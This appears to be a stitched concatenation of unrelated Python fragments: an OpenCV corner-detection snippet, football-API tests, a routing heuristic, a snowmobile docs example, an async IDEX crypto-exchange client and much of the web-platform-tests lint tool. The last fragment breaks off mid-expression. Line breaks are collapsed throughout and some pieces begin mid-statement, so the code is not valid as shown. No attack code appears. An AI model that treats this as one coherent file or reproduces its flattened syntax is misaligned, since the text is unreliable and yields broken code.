cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) gray = np.float32(gray) # 检测图像角点 # 第二个参数值越小,标记角点的记号越小 # 第三个参数限定了Sobel算子的中孔(aperture) # 该参数定义了角点检测的敏感度,取值必须在3到31之间的奇数 dst = cv2.cornerHarris(gray, 2, 23, 0.04) # 将角点的位置标记为红色 img[dst > 0.01 * dst.max()] = [0, 0, 255] while True: cv2.imshow('corners', img) if cv2.waitKey(1000//12) & 0xff == ord('q'): break cv2.destroyAllWindows() from .bokeh import scatterplot from .bokeh import overlay_regression_line from .display import bokeh_image_slider tests/test_api.py10-100 def test_get_actions(api): df_actions = api.get_actions(7584) assert len(df_actions) def test_get_home_away_team_id(api): home_id, away_id = api.get_home_away_team_id(7584) assert home_id == 782 assert away_id == 778 def test_get_team_name(api): name = api.get_team_name(782) assert name == 'Belgium' def test_get_player_name(api): name = api.get_player_name(3089) assert name == '' from copy import deepcopy import numpy as np from numpy.random import Generator from heuristic.classes import Solution from heuristic.functions import random_selection, remove_empty_routes @remove_empty_routes def _worst(costs: np.ndarray, current: Solution, rnd_state: Generator) -> Solution: """ Randomly removes the worst customers based on the passed-in costs array. The random distribution is skewed to favour worst-cost customers. Internal - should not be exposed outside this module. """ destroyed = deepcopy(current) # First we sort the costs to obtain the customers by increasing cost. We # then randomly select customers, favouring worst customers. customers = np.argsort(costs) customers = customers[-random_selection(rnd_state)] for customer in customers: destroyed.unassigned.append(customer) route = destroyed.find_route(customer) route.remove_customer(customer) return destroyed GEM7318/Snowmobiledocs/snippets/overview/overview.py """ Demonstrate core functionality of snowmobile.. ../docs/snippets/overview/overview.py """ # -- Connecting -- # Block 1 import snowmobile sn = snowmobile.connect() # Block 2 print(sn) #> snowmobile.Snowmobile(creds='') print(sn.cfg) #> snowmobile.Configuration('snowmobile.toml') print(type(sn.con)) #> type(sn) #> snowmobile.core.connection.Snowmobile type(sn.con) #> None type(sn.cfg) #> snowmobile.core.configuration.Configuration print(sn.cfg.location) # 'path/to/your/snowmobile.toml' type(sn.cfg.connection) #> snowmobile.core.cfg.connection.Connection type(sn.cfg.loading) #> snowmobile.core.cfg.loading.Loading type(sn.cfg.script) #> snowmobile.core.cfg.script.Script type(sn.cfg.sql) #> snowmobile.core.cfg.other.SQL type(sn.cfg.ext_sources) #> snowmobile.core.cfg.other.Location # -- complete example; should run 'as is' -- import aiohttp import asyncio import re from idex.client import BaseClient, Client from idex.exceptions import IdexException, IdexAPIException, IdexRequestException, IdexCurrencyNotFoundException from idex.decorators import require_address, require_private_key class AsyncClient(BaseClient): @classmethod async def create(cls, api_key, address=None, private_key=None): self = AsyncClient(api_key) if address: await self.set_wallet_address(address, private_key) return self def _init_session(self): loop = asyncio.get_event_loop() session = aiohttp.ClientSession( loop=loop, headers=self._get_headers() ) return session async def _request(self, method, path, signed, **kwargs): kwargs = self._get_request_kwargs(signed, **kwargs) uri = self._create_uri(path) async with getattr(self.session, method)(uri, **kwargs) as response: self._last_response = response return await self._handle_response(response) @staticmethod async def _handle_response(response): """Internal helper for handling API responses from the Quoine server. Raises the appropriate exceptions when necessary; otherwise, returns the response. """ if not str(response.status).startswith('2'): raise IdexAPIException(response, response.status, await response.text()) try: res = await response.json() if 'error' in res: raise IdexAPIException(response, response.status, await response.text()) return res except ValueError: txt = await response.text() raise IdexRequestException('Invalid Response: {}'.format(txt)) async def _get(self, path, signed=False, **kwargs): return await self._request('get', path, signed, **kwargs) async def _post(self, path, signed=False, **kwargs): return await self._request('post', path, signed, **kwargs) async def _put(self, path, signed=False, **kwargs): return await self._request('put', path, signed, **kwargs) async def _delete(self, path, signed=False, **kwargs): return await self._request('delete', path, signed, **kwargs) async def set_wallet_address(self, address, private_key=None): self._wallet_address = address.lower() nonce_res = await self.get_my_next_nonce() self._start_nonce = nonce_res['nonce'] if private_key: if re.match(r"^0x[0-9a-zA-Z]{64}$", private_key) is None: raise(IdexException("Private key in invalid format must satisfy 0x[0-9a-zA-Z]{64}")) self._private_key = private_key set_wallet_address.__doc__ = Client.set_wallet_address.__doc__ # Market Endpoints async def get_tickers(self): return await self._post('returnTicker') get_tickers.__doc__ = Client.get_tickers.__doc__ async def get_ticker(self, market): data = { 'market': market } return await self._post('returnTicker', False, json=data) get_ticker.__doc__ = Client.get_ticker.__doc__ async def get_24hr_volume(self): return await self._post('return24Volume') get_24hr_volume.__doc__ = Client.get_24hr_volume.__doc__ async def get_order_book(self, market, count=1): data = { 'market': market, 'count': count } return await self._post('returnOrderBook', False, json=data) get_order_book.__doc__ = Client.get_order_book.__doc__ async def get_open_orders(self, market, address, count=10, cursor=None): data = { 'market': market, 'address': address, 'count': count } if cursor: data['cursor'] = cursor return await self._post('returnOpenOrders', False, json=data) get_open_orders.__doc__ = Client.get_open_orders.__doc__ @require_address async def get_my_open_orders(self, market, count=10, cursor=None): return await self.get_open_orders(market, self._wallet_address, count, cursor) get_my_open_orders.__doc__ = Client.get_my_open_orders.__doc__ async def get_order_status(self, order_hash): data = { 'orderHash': order_hash } return await self._post('returnOrderStatus', False, json=data) get_order_status.__doc__ = Client.get_order_status.__doc__ async def get_trade_history(self, market=None, address=None, start=None, end=None, count=10, sort='desc', cursor=None): data = {} if market: data['market'] = market if address: data['address'] = address if start: data['start'] = start if end: data['end'] = end return await self._post('returnTradeHistory', False, json=data) get_trade_history.__doc__ = Client.get_trade_history.__doc__ @require_address async def get_my_trade_history(self, market=None, start=None, end=None, count=10, sort='desc', cursor=None): return await self.get_trade_history(market, self._wallet_address, start, end) get_my_trade_history.__doc__ = Client.get_my_trade_history.__doc__ async def get_currencies(self): return await self._post('returnCurrencies') get_currencies.__doc__ = Client.get_currencies.__doc__ async def get_currency(self, currency): if currency not in self._currency_addresses: self._currency_addresses = await self.get_currencies() res = None if currency[:2] == '0x': for token, c in self._currency_addresses.items(): if c['address'] == currency: res = c break # check if we found the currency if res is None: raise IdexCurrencyNotFoundException(currency) else: if currency not in self._currency_addresses: raise IdexCurrencyNotFoundException(currency) res = self._currency_addresses[currency] return res get_currency.__doc__ = Client.get_currency.__doc__ async def get_balances(self, address, complete=False): data = { 'address': address } path = 'returnBalances' if complete: path = 'returnCompleteBalances' return await self._post(path, False, json=data) get_balances.__doc__ = Client.get_balances.__doc__ @require_address async def get_my_balances(self, complete=False): return await self.get_balances(self._wallet_address, complete) get_my_balances.__doc__ = Client.get_my_balances.__doc__ async def get_transfers(self, address, start=None, end=None): data = { 'address': address } if start: data['start'] = start if end: data['end'] = end return await self._post('returnDepositsWithdrawals', False, json=data) get_transfers.__doc__ = Client.get_transfers.__doc__ @require_address async def get_my_transfers(self, start=None, end=None): return await self.get_transfers(self._wallet_address, start, end) get_my_transfers.__doc__ = Client.get_my_transfers.__doc__ async def get_order_trades(self, order_hash): data = { 'orderHash': order_hash } return await self._post('returnOrderTrades', False, json=data) get_order_trades.__doc__ = Client.get_order_trades.__doc__ async def get_next_nonce(self, address): data = { 'address': address } return await self._post('returnNextNonce', False, json=data) get_next_nonce.__doc__ = Client.get_next_nonce.__doc__ @require_address async def get_my_next_nonce(self): return await self.get_next_nonce(self._wallet_address) get_my_next_nonce.__doc__ = Client.get_my_next_nonce.__doc__ async def _get_contract_address(self): if not self._contract_address: res = await self.get_contract_address() self._contract_address = res['address'] return self._contract_address _get_contract_address.__doc__ = Client._get_contract_address.__doc__ async def get_contract_address(self): return await self._post('returnContractAddress') get_contract_address.__doc__ = Client.get_contract_address.__doc__ # Trade Endpoints async def parse_from_currency_quantity(self, currency, quantity): currency_details = await self.get_currency(currency) return self._parse_from_currency_quantity(currency_details, quantity) parse_from_currency_quantity.__doc__ = Client.parse_from_currency_quantity.__doc__ async def convert_to_currency_quantity(self, currency, quantity): currency_details = await self.get_currency(currency) return self._convert_to_currency_quantity(currency_details, quantity) convert_to_currency_quantity.__doc__ = Client.convert_to_currency_quantity.__doc__ @require_address async def create_order(self, token_buy, token_sell, price, quantity): # convert buy and sell amounts based on decimals price = self._num_to_decimal(price) quantity = self._num_to_decimal(quantity) sell_quantity = price * quantity amount_buy = await self.convert_to_currency_quantity(token_buy, quantity) amount_sell = await self.convert_to_currency_quantity(token_sell, sell_quantity) return await self.create_order_wei(token_buy, token_sell, amount_buy, amount_sell) create_order.__doc__ = Client.create_order.__doc__ @require_address @require_private_key async def create_order_wei(self, token_buy, token_sell, amount_buy, amount_sell): contract_address = await self._get_contract_address() buy_currency = await self.get_currency(token_buy) sell_currency = await self.get_currency(token_sell) hash_data = [ ['contractAddress', contract_address, 'address'], ['tokenBuy', buy_currency['address'], 'address'], ['amountBuy', amount_buy, 'uint256'], ['tokenSell', sell_currency['address'], 'address'], ['amountSell', amount_sell, 'uint256'], ['expires', '10000', 'uint256'], ['nonce', self._get_nonce(), 'uint256'], ['address', self._wallet_address, 'address'], ] return await self._post('order', True, hash_data=hash_data) create_order_wei.__doc__ = Client.create_order_wei.__doc__ @require_address @require_private_key async def create_trade(self, order_hash, token, amount): amount_trade = await self.convert_to_currency_quantity(token, amount) hash_data = [ ['orderHash', order_hash, 'address'], ['amount', amount_trade, 'uint256'], ['address', self._wallet_address, 'address'], ['nonce', self._get_nonce(), 'uint256'], ] return await self._post('trade', True, hash_data=hash_data) create_trade.__doc__ = Client.create_trade.__doc__ @require_address @require_private_key async def cancel_order(self, order_hash): hash_data = [ ['orderHash', order_hash, 'address'], ['nonce', self._get_nonce(), 'uint256'], ] json_data = { 'address': self._wallet_address } return await self._post('cancel', True, hash_data=hash_data, json=json_data) cancel_order.__doc__ = Client.cancel_order.__doc__ # Withdraw Endpoints @require_address @require_private_key async def withdraw(self, amount, token): contract_address = await self._get_contract_address() currency = await self.get_currency(token) # convert amount amount = await self.convert_to_currency_quantity(token, amount) hash_data = [ ['contractAddress', contract_address, 'address'], ['token', currency['address'], 'address'], ['amount', amount, 'uint256'], ['address', self._wallet_address, 'address'], ['nonce', self._get_nonce(), 'uint256'], ] return await self._post('withdraw', True, hash_data=hash_data) withdraw.__doc__ = Client.withdraw.__doc__ Kaiido/wpt from __future__ import print_function, unicode_literals import abc import argparse import ast import io import json import logging import os import re import subprocess import sys import tempfile from collections import defaultdict from . import fnmatch from . import rules from .. import localpaths from ..gitignore.gitignore import PathFilter from ..wpt import testfiles from ..manifest.vcs import walk from ..manifest.sourcefile import SourceFile, js_meta_re, python_meta_re, space_chars, get_any_variants from six import binary_type, ensure_binary, ensure_text, iteritems, itervalues, with_metaclass from six.moves import range from six.moves.urllib.parse import urlsplit, urljoin MYPY = False if MYPY: # MYPY is set to True when run under Mypy. from typing import Any from typing import Dict from typing import IO from typing import Iterable from typing import List from typing import Optional from typing import Sequence from typing import Set from typing import Text from typing import Tuple from typing import Type # The Ignorelist is a two level dictionary. The top level is indexed by # error names (e.g. 'TRAILING WHITESPACE'). Each of those then has a map of # file patterns (e.g. 'foo/*') to a set of specific line numbers for the # exception. The line numbers are optional; if missing the entire file # ignores the error. Ignorelist = Dict[Text, Dict[Text, Set[Optional[int]]]] try: from xml.etree import cElementTree as ElementTree except ImportError: from xml.etree import ElementTree as ElementTree # type: ignore logger = None # type: Optional[logging.Logger] def setup_logging(prefix=False): # type: (bool) -> None global logger if logger is None: logger = logging.getLogger(os.path.basename(os.path.splitext(__file__)[0])) handler = logging.StreamHandler(sys.stdout) # type: logging.Handler # Only add a handler if the parent logger is missing a handler parent = logger.parent assert isinstance(parent, logging.Logger) if parent and len(parent.handlers) == 0: handler = logging.StreamHandler(sys.stdout) logger.addHandler(handler) if prefix: format = logging.BASIC_FORMAT else: format = str("%(message)s") formatter = logging.Formatter(format) for handler in logger.handlers: handler.setFormatter(formatter) logger.setLevel(logging.DEBUG) setup_logging() ERROR_MSG = """You must fix all errors; for details on how to fix them, see https://web-platform-tests.org/writing-tests/lint-tool.html However, instead of fixing a particular error, it's sometimes OK to add a line to the lint.ignore file in the root of the web-platform-tests directory to make the lint tool ignore it. For example, to make the lint tool ignore all '%s' errors in the %s file, you could add the following line to the lint.ignore file. %s: %s""" def all_filesystem_paths(repo_root, subdir=None): # type: (Text, Optional[Text]) -> Iterable[Text] path_filter = PathFilter(repo_root.encode("utf8"), extras=[ensure_binary(".git/")]) if subdir: expanded_path = subdir.encode("utf8") subdir_str = expanded_path else: expanded_path = repo_root.encode("utf8") for dirpath, dirnames, filenames in path_filter(walk(expanded_path)): for filename, _ in filenames: path = os.path.join(dirpath, filename) if subdir: path = os.path.join(subdir_str, path) assert not os.path.isabs(path), path yield ensure_text(path) def _all_files_equal(paths): # type: (Iterable[Text]) -> bool """ Checks all the paths are files that are byte-for-byte identical :param paths: the list of paths to compare :returns: True if they are all identical """ paths = list(paths) if len(paths) < 2: return True first = paths.pop() size = os.path.getsize(first) if any(os.path.getsize(path) != size for path in paths): return False # Chunk this to avoid eating up memory and file descriptors bufsize = 4096*4 # 16KB, a "reasonable" number of disk sectors groupsize = 8 # Hypothesised to be large enough in the common case that everything fits in one group with open(first, "rb") as first_f: for start in range(0, len(paths), groupsize): path_group = paths[start:start+groupsize] first_f.seek(0) try: files = [open(x, "rb") for x in path_group] for _ in range(0, size, bufsize): a = first_f.read(bufsize) for f in files: b = f.read(bufsize) if a != b: return False finally: for f in files: f.close() return True def check_path_length(repo_root, path): # type: (Text, Text) -> List[rules.Error] if len(path) + 1 > 150: return [rules.PathLength.error(path, (path, len(path) + 1))] return [] def check_file_type(repo_root, path): # type: (Text, Text) -> List[rules.Error] if os.path.islink(path): return [rules.FileType.error(path, (path, "symlink"))] return [] def check_worker_collision(repo_root, path): # type: (Text, Text) -> List[rules.Error] endings = [(".any.html", ".any.js"), (".any.worker.html", ".any.js"), (".worker.html", ".worker.js")] for path_ending, generated in endings: if path.endswith(path_ending): return [rules.WorkerCollision.error(path, (path_ending, generated))] return [] def check_gitignore_file(repo_root, path): # type: (Text, Text) -> List[rules.Error] if not path.endswith(".gitignore"): return [] path_parts = path.split(os.path.sep) if len(path_parts) == 1: return [] if path_parts[-1] != ".gitignore": return [] if (path_parts[0] in ["tools", "docs"] or path_parts[:2] == ["resources", "webidl2"] or path_parts[:3] == ["css", "tools", "apiclient"]): return [] return [rules.GitIgnoreFile.error(path)] def check_ahem_copy(repo_root, path): # type: (Text, Text) -> List[rules.Error] lpath = path.lower() if "ahem" in lpath and lpath.endswith(".ttf"): return [rules.AhemCopy.error(path)] return [] def check_tentative_directories(repo_root, path): # type: (Text, Text) -> List[rules.Error] path_parts = path.split(os.path.sep) for directory in path_parts[:-1]: if "tentative" in directory and directory != "tentative": return [rules.TentativeDirectoryName.error(path)] return [] def check_git_ignore(repo_root, paths): # type: (Text, List[Text]) -> List[rules.Error] errors = [] with tempfile.TemporaryFile('w+') as f: f.write('\n'.join(paths)) f.seek(0) try: matches = subprocess.check_output( ["git", "check-ignore", "--verbose", "--no-index", "--stdin"], stdin=f) for match in matches.strip().split(b'\n'): match_filter, path_bytes = match.split() _, _, filter_string = match_filter.split(b':') # If the matching filter reported by check-ignore is a special-case exception, # that's fine. Otherwise, it requires a new special-case exception. if filter_string[0:1] != b'!': path = path_bytes.decode("utf8") errors.append(rules.IgnoredPath.error(path, (path,))) except subprocess.CalledProcessError: # Nonzero return code means that no match exists. pass return errors drafts_csswg_re = re.compile(r"https?\:\/\/drafts\.csswg\.org\/([^/?#]+)") w3c_tr_re = re.compile(r"https?\:\/\/www\.w3c?\.org\/TR\/([^/?#]+)") w3c_dev_re = re.compile(r"https?\:\/\/dev\.w3c?\.org\/[^/?#]+\/([^/?#]+)") def check_css_globally_unique(repo_root, paths): # type: (Text, List[Text]) -> List[rules.Error] """ Checks that CSS filenames are sufficiently unique This groups files by path classifying them as "test", "reference", or "support". "test" files must have a unique name across files that share links to the same spec. "reference" and "support" files, on the other hand, must have globally unique names. :param repo_root: the repository root :param paths: list of all paths :returns: a list of errors found in ``paths`` """ test_files = defaultdict(set) # type: Dict[Text, Set[Text]] ref_files = defaultdict(set) # type: Dict[Text, Set[Text]] support_files = defaultdict(set) # type: Dict[Text, Set[Text]] for path in paths: if os.name == "nt": path = path.replace(u"\\", u"/") if not path.startswith(u"css/"): continue source_file = SourceFile(repo_root, path, u"/") if source_file.name_is_non_test: # If we're name_is_non_test for a reason apart from support, ignore it. # We care about support because of the requirement all support files in css/ to be in # a support directory; see the start of check_parsed. offset = path.find(u"/support/") if offset == -1: continue parts = source_file.dir_path.split(os.path.sep) if (parts[0] in source_file.root_dir_non_test or any(item in source_file.dir_non_test - {u"support"} for item in parts) or any(parts[:len(non_test_path)] == list(non_test_path) for non_test_path in source_file.dir_path_non_test)): continue support_name = path[offset+1:] support_files[support_name].add(path) elif source_file.name_is_reference: ref_files[source_file.name].add(path) else: test_name = source_file.name # type: Text test_name = test_name.replace(u'-manual', u'') test_files[test_name].add(path) errors = [] for name, colliding in iteritems(test_files): if len(colliding) > 1: if not _all_files_equal([os.path.join(repo_root, x) for x in colliding]): # Only compute by_spec if there are prima-facie collisions because of cost by_spec = defaultdict(set) # type: Dict[Text, Set[Text]] for path in colliding: source_file = SourceFile(repo_root, path, u"/") for link in source_file.spec_links: for r in (drafts_csswg_re, w3c_tr_re, w3c_dev_re): m = r.match(link) if m: spec = m.group(1) break else: continue by_spec[spec].add(path) for spec, spec_paths in iteritems(by_spec): if not _all_files_equal([os.path.join(repo_root, x) for x in spec_paths]): for x in spec_paths: context1 = (name, spec, ", ".join(sorted(spec_paths))) errors.append(rules.CSSCollidingTestName.error(x, context1)) for rule_class, d in [(rules.CSSCollidingRefName, ref_files), (rules.CSSCollidingSupportName, support_files)]: for name, colliding in iteritems(d): if len(colliding) > 1: if not _all_files_equal([os.path.join(repo_root, x) for x in colliding]): context2 = (name, ", ".join(sorted(colliding))) for x in colliding: errors.append(rule_class.error(x, context2)) return errors def check_unique_testharness_basenames(repo_root, paths): # type: (Text, List[Text]) -> List[rules.Error] """ Checks that all testharness files have unique basename paths. The 'basename path' refers to the entire path excluding the extension. For example, 'foo/bar/baz.html' and 'foo/bar/baz.xhtml' have the same basename path, but 'foo/bar/baz.html' and 'foo/qux/baz.html' do not. Testharness files with identical basenames have caused issues in downstream infrastructure (see https://github.com/web-platform-tests/wpt/issues/7570), and may cause confusion in general. :param repo_root: the repository root :param paths: list of all paths :returns: a list of errors found in ``paths`` """ errors = [] file_dict = defaultdict(list) for path in paths: source_file = SourceFile(repo_root, path, "/") if source_file.type != "testharness": continue file_name, file_extension = os.path.splitext(path) file_dict[file_name].append(file_extension) for k, v in file_dict.items(): if len(v) == 1: continue context = (', '.join(v),) for extension in v: errors.append(rules.DuplicateBasenamePath.error(k + extension, context)) return errors def parse_ignorelist(f): # type: (IO[Text]) -> Tuple[Ignorelist, Set[Text]] """ Parse the ignorelist file given by `f`, and return the parsed structure. :returns: a tuple of an Ignorelist and a set of files that are completely skipped by the linter (i.e. have a '*' entry). """ data = defaultdict(lambda:defaultdict(set)) # type: Ignorelist skipped_files = set() # type: Set[Text] for line in f: line = line.strip() if not line or line.startswith("#"): continue parts = [item.strip() for item in line.split(":")] if len(parts) == 2: error_types_s, file_match = parts line_number = None # type: Optional[int] else: error_types_s, file_match, line_number_s = parts line_number = int(line_number_s) error_types = {item.strip() for item in error_types_s.split(",")} file_match = os.path.normcase(file_match) if "*" in error_types: skipped_files.add(file_match) else: for error_type in error_types: data[error_type][file_match].add(line_number) return data, skipped_files def filter_ignorelist_errors(data, errors): # type: (Ignorelist, Sequence[rules.Error]) -> List[rules.Error] """ Filter out those errors that are ignored in `data`. """ if not errors: return [] skipped = [False for item in range(len(errors))] for i, (error_type, msg, path, line) in enumerate(errors): normpath = os.path.normcase(path) # Allow skipping all lint errors except the IGNORED PATH lint, # which explains how to fix it correctly and shouldn't be skipped. if error_type in data and error_type != "IGNORED PATH": wl_files = data[error_type] for file_match, allowed_lines in iteritems(wl_files): if None in allowed_lines or line in allowed_lines: if fnmatch.fnmatchcase(normpath, file_match): skipped[i] = True return [item for i, item in enumerate(errors) if not skipped[i]] regexps = [item() for item in # type: ignore [rules.TrailingWhitespaceRegexp, rules.TabsRegexp, rules.CRRegexp, rules.SetTimeoutRegexp, rules.W3CTestOrgRegexp, rules.WebPlatformTestRegexp, rules.Webidl2Regexp, rules.ConsoleRegexp, rules.GenerateTestsRegexp, rules.PrintRegexp, rules.LayoutTestsRegexp, rules.MissingDepsRegexp, rules.SpecialPowersRegexp, rules.AssertThrowsRegexp, rules.PromiseRejectsRegexp, rules.AssertPreconditionRegexp]] def check_regexp_line(repo_root, path, f): # type: (Text, Text, IO[bytes]) -> List[rules.Error] errors = [] # type: List[rules.Error] applicable_regexps = [regexp for regexp in regexps if regexp.applies(path)] for i, line in enumerate(f): for regexp in applicable_regexps: if regexp.search(line): errors.append((regexp.name, regexp.description, path, i+1)) return errors def check_parsed(repo_root, path, f): # type: (Text, Text, IO[bytes]) -> List[rules.Error] source_file = SourceFile(repo_root, path, "/", contents=f.read()) errors = [] # type: List[rules.Error] if path.startswith("css/"): if (source_file.type == "support" and not source_file.name_is_non_test and not source_file.name_is_reference): return [rules.SupportWrongDir.error(path)] if (source_file.type != "support" and not source_file.name_is_reference and not source_file.name_is_tentative and not source_file.spec_links): return [rules.MissingLink.error(path)] if source_file.name_is_non_test: return [] if source_file.markup_type is None: return [] if source_file.root is None: return [rules.ParseFailed.error(path)] if source_file.type == "manual" and not source_file.name_is_manual: errors.append(rules.ContentManual.error(path)) if source_file.type == "visual" and not source_file.name_is_visual: errors.append(rules.ContentVisual.error(path)) about_blank_parts = urlsplit("about:blank") for reftest_node in source_file.reftest_nodes: href = reftest_node.attrib.get("href", "").strip(space_chars) parts = urlsplit(href) if parts == about_blank_parts: continue if (parts.scheme or parts.netloc): errors.append(rules.AbsoluteUrlRef.error(path, (href,))) continue ref_url = urljoin(source_file.url, href) ref_parts = urlsplit(ref_url) if source_file.url == ref_url: errors.append(rules.SameFileRef.error(path)) continue assert ref_parts.path != "" reference_file = os.path.join(repo_root, ref_parts.path[1:]) reference_rel = reftest_node.attrib.get("rel", "") if not os.path.isfile(reference_file): errors.append(rules.NonexistentRef.error(path, (reference_rel, href))) if len(source_file.timeout_nodes) > 1: errors.append(rules.MultipleTimeout.error(path)) for timeout_node in source_file.timeout_nodes: timeout_value = timeout_node.attrib.get("content", "").lower() if timeout_value != "long": errors.append(rules.InvalidTimeout.error(path, (timeout_value,))) required_elements = [] # type: List[Text] testharnessreport_nodes = [] # type: List[ElementTree.Element] if source_file.testharness_nodes: test_type = source_file.manifest_items()[0] if test_type not in ("testharness", "manual"): errors.append(rules.TestharnessInOtherType.error(path, (test_type,))) if len(source_file.testharness_nodes) > 1: errors.append(rules.MultipleTestharness.error(path)) testharnessreport_nodes = source_file.root.findall(".//{http://www.w3.org/1999/xhtml}script[@src='/resources/testharnessreport.js']") if not testharnessreport_nodes: errors.append(rules.MissingTestharnessReport.error(path)) else: if len(testharnessreport_nodes) > 1: errors.append(rules.MultipleTestharnessReport.error(path)) for element in source_file.variant_nodes: if "content" not in element.attrib: errors.append(rules.VariantMissing.error(path)) else: variant = element.attrib["content"] if variant != "" and variant[0] not in ("?", "#"): errors.append(rules.MalformedVariant.error(path, (path,))) required_elements.extend(key for key, value in {"testharness": True, "testharnessreport": len(testharnessreport_nodes) > 0, "timeout": len(source_file.timeout_nodes) > 0}.items() if value) testdriver_vendor_nodes = [] # type: List[ElementTree.Element] if source_file.testdriver_nodes: if len(source_file.testdriver_nodes) > 1: errors.append(rules.MultipleTestdriver.error(path)) testdriver_vendor_nodes = source_file.root.findall(".//{http://www.w3.org/1999/xhtml}script[@src='/resources/testdriver-vendor.js']") if not testdriver_vendor_nodes: errors.append(rules.MissingTestdriverVendor.error(path)) else: if len(testdriver_vendor_nodes) > 1: errors.append(rules.MultipleTestdriverVendor.error(path)) required_elements.append("testdriver") if len(testdriver_vendor_nodes) > 0: required_elements.append("testdriver-vendor") if required_elements: seen_elements = defaultdict(bool) for elem in source_file.root.iter(): if source_file.timeout_nodes and elem == source_file.timeout_nodes[0]: seen_elements["timeout"] = True if seen_elements["testharness"]: errors.append(rules.LateTimeout.error(path)) elif source_file.testharness_nodes and elem == source_file.testharness_nodes[0]: seen_elements["testharness"] = True elif testharnessreport_nodes and elem == testharnessreport_nodes[0]: seen_elements["testharnessreport"] = True if not seen_elements["testharness"]: errors.append(rules.EarlyTestharnessReport.error(path)) elif source_file.testdriver_nodes and elem == source_file.testdriver_nodes[0]: seen_elements["testdriver"] = True elif testdriver_vendor_nodes and elem == testdriver_vendor_nodes[0]: seen_elements["testdriver-vendor"] = True if not seen_elements["testdriver"]: errors.append(rules.EarlyTestdriverVendor.error(path)) if all(seen_elements[name] for name in required_elements): break for element in source_file.root.findall(".//{http://www.w3.org/1999/xhtml}script[@src]"): src = element.attrib["src"] def incorrect_path(script, src): # type: (Text, Text) -> bool return (script == src or ("/%s" % script in src and src != "/resources/%s" % script)) if incorrect_path("testharness.js", src): errors.append(rules.TestharnessPath.error(path)) if incorrect_path("testharnessreport.js", src): errors.append(rules.TestharnessReportPath.error(path)) if incorrect_path("testdriver.js", src): errors.append(rules.TestdriverPath.error(path)) if incorrect_path("testdriver-vendor.js", src): errors.append(rules.TestdriverVendorPath.error(path)) return errors class ASTCheck(with_metaclass(abc.ABCMeta)): @abc.abstractproperty def rule(self): # type: () -> Type[rules.Rule] pass @abc.abstractmethod def check(self, root): # type: (ast.AST) -> List[int] pass class OpenModeCheck(ASTCheck): rule = rules.OpenNoMode def check(self, root): # type: (ast.AST) -> List[int] errors = [] for node in ast.walk(root): if isinstance(node, ast.Call): if hasattr(node.func, "id") and node.func.id in ("open", "file"): # type: ignore if (len(node.args) < 2 and all(item.arg != "mode" for item in node.keywords)): errors.append(node.lineno) return errors ast_checkers = [item() for item in [OpenModeCheck]] def check_python_ast(repo_root, path, f): # type: (Text, Text, IO[bytes]) -> List[rules.Error] # *.quic.py are Python 3 only and cannot be parsed by Python 2. if not path.endswith(".py") or path.endswith(".quic.py"): return [] try: root = ast.parse(f.read()) except SyntaxError as e: return [rules.ParseFailed.error(path, line_no=e.lineno)] errors = [] for checker in ast_checkers: for lineno in checker.check(root): errors.append(checker.rule.error(path, line_no=lineno)) return errors broken_js_metadata = re.compile(br"//\s*META:") broken_python_metadata = re.compile(br"#\s*META:") def check_global_metadata(value): # type: (bytes) -> Iterable[Tuple[Type[rules.Rule], Tuple[Any, ...]]] global_values = {item.strip().decode("utf8") for item in value.split(b",") if item.strip()} # TODO: this could check for duplicates and such for global_value in global_values: if not get_any_variants(global_value): yield (rules.UnknownGlobalMetadata, ()) def check_script_metadata(repo_root, path, f): # type: (Text, Text, IO[bytes]) -> List[rules.Error] if path.endswith((".worker.js", ".any.js")): meta_re = js_meta_re broken_metadata = broken_js_metadata elif path.endswith(".py"): meta_re = python_meta_re broken_metadata = broken_python_metadata else: return [] done = False errors = [] for idx, line in enumerate(f): assert isinstance(line, binary_type), line m = meta_re.match(line) if m: key, value = m.groups() if key == b"global": for rule_class, context in check_global_metadata(value): errors.append(rule_class.error(path, context, idx + 1)) elif key == b"timeout": if value != b"long": errors.append(rules.UnknownTimeoutMetadata.error(path, line_no=idx + 1)) elif key not in (b"title", b"script", b"variant", b"quic"): errors.append(rules.UnknownMetadata.error(path, line_no=idx + 1)) else: done = True if done: if meta_re.match(line): errors.append(rules.StrayMetadata.error(path, line_no=idx + 1)) elif meta_re.search(line): errors.append(rules.IndentedMetadata.error(path, line_no=idx + 1)) elif broken_metadata.search(line): errors.append(rules.BrokenMetadata.error(path, line_no=idx + 1)) return errors ahem_font_re = re.compile(br"font.*:.*ahem", flags=re.IGNORECASE) # Ahem can appear either in the global location or in the support # directory for legacy Mozilla imports ahem_stylesheet_re = re.compile(br"\/fonts\/ahem\.css|support\/ahem.css", flags=re.IGNORECASE) def check_ahem_system_font(repo_root, path, f): # type: (Text, Text, IO[bytes]) -> List[rules.Error] if not path.endswith((".html", ".htm", ".xht", ".xhtml")): return [] contents = f.read() errors = [] if ahem_font_re.search(contents) and not ahem_stylesheet_re.search(contents): errors.append(rules.AhemSystemFont.error(path)) return errors def check_path(repo_root, path): # type: (Text, Text) -> List[rules.Error] """ Runs lints that check the file path. :param repo_root: the repository root :param path: the path of the file within the repository :returns: a list of errors found in ``path`` """ errors = [] for path_fn in path_lints: errors.extend(path_fn(repo_root, path)) return errors def check_all_paths(repo_root, paths): # type: (Text, List[Text]) -> List[rules.Error] """ Runs lints that check all paths globally. :param repo_root: the repository root :param paths: a list of all the paths within the repository :returns: a list of errors found in ``f`` """ errors = [] for paths_fn in all_paths_lints: errors.extend(paths_fn(repo_root, paths)) return errors def check_file_contents(repo_root, path, f): # type: (Text, Text, IO[bytes]) -> List[rules.Error] """ Runs lints that check the file contents. :param repo_root: the repository root :param path: the path of the file within the repository :param f: a file-like object with the file contents :returns: a list of errors found in ``f`` """ errors = [] for file_fn in file_lints: errors.extend(file_fn(repo_root, path, f)) f.seek(0) return errors def output_errors_text(errors): # type: (List[rules.Error]) -> None assert logger is not None for error_type, description, path, line_number in errors: pos_string = path if line_number: pos_string += ":%s" % line_number logger.error("%s: %s (%s)" % (pos_string, description, error_type)) def output_errors_markdown(errors): # type: (List[rules.Error]) -> None if not errors: return assert logger is not None heading = """Got lint errors: | Error Type | Position | Message | |------------|----------|---------|""" for line in heading.split("\n"): logger.error(line) for error_type, description, path, line_number in errors: pos_string = path if line_number: pos_string += ":%s" % line_number logger.error("%s | %s | %s |" % (error_type, pos_string, description)) def output_errors_json(errors): # type: (List[rules.Error]) -> None for error_type, error, path, line_number in errors: print(json.dumps({"path": path, "lineno": line_number, "rule": error_type, "message": error})) def output_error_count(error_count): # type: (Dict[Text, int]) -> None if not error_count: return assert logger is not None by_type = " ".join("%s: %d" % item for 